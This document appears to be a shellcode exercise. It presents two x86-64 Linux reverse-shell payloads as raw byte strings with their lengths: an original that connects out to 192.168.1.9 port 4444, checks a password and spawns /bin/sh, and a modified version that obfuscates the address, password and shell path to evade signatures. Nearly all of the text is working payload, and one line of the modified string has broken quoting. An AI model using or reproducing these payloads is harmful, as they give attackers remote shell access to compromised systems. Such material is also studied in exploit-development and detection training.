Original_Shellcode:

"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05"
"\x48\x97\xc7\x44\x24\xfc"
"\xc0\xa8\x01\x09\x66\xc7\x44\x24\xfa"
"\x11\x5c" //port big endiant
"\xc6\x44\x24\xf8\x02\x48\x83"
"\xec\x08\x6a\x2a\x58\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05"
"\x75\xf6\x48\x89\xc7\x99\x88\x44\x24\xff\x48\x83"
"\xec\x01\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f"
"\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57"
"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05"
"\x5f\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
"\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48"
"\x89\xe6\x04\x3b\x0f\x05";

Original_Shellcode length = 138 bytes


Modified_shellcode:

"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f"
"\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0"
"\x50\xbb\x80\xff\xff\xfe\xf7\xd3\x89\x5c\x24\xfc"
"\x48\x83\xec\x04\x4d\x31\xc9\x66\x68\x11\x5c\x66"
"\x6a\x02\x54\x5e\x6a\x10\x5a\x6a\x2a\x58\x0f\x05"
"\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x54"
"\x5e\x48\x31\xc0\x0f\x05\x68\x68\x61\x63\x6b\x58"
"\x48\x8d\x3e\xaf\x31\xf6\x4d\x31\xff\x66\x41\xbf"
"\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89"
"\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48"
"\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f"
\x41\xff\xd7";

Modified_Shellcode = 135 bytes
